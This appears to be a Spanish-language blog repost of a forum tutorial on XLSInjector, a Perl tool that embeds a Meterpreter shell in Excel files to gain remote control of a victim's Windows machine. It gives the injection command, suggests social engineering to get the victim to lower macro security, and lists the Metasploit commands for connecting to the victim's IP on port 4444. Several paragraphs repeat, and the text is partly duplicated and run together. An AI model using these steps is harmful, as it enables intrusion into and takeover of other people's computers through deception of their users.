Exploit
Es una herramienta creada en perl por keith lee que permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.
Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:
* Una Maquina (virtual o real) con Windows
* Microsoft Excel
* Perl
* El modulo Win32:OLE para Perl
* Un archivo XML a infectar
* El XLSInjector
* y por ultimo el Metasploit Framework
Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su ejecución, que es bastante simple:
Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework
iniciamos la consola del metasploit:
XLSInjector – Inyectar Shell Meterpreter en Archivos Excel
Es una herramienta creada en perl por keith lee que permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.
Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:
* Una Maquina (virtual o real) con Windows
* Microsoft Excel
* Perl
* El modulo Win32:OLE para Perl
* Un archivo XML a infectar
* El XLSInjector
* y por ultimo el Metasploit Framework
Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su ejecución, que es bastante simple:
perl xlsinjector.pl -i ArchivoDeExcel.xls -o ArchivoConShellDeExcel.xlsPero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que “confié” en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.
Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework
iniciamos la consola del metasploit:
set payload windows/meterpreter/bind_tcp set RHOST ipdelpcvictima set RPOT 4444 exploitEste post fue realizado por Stuxnet en el foro. Click aca para ir al post original y postear tus dudas
0 comentarios: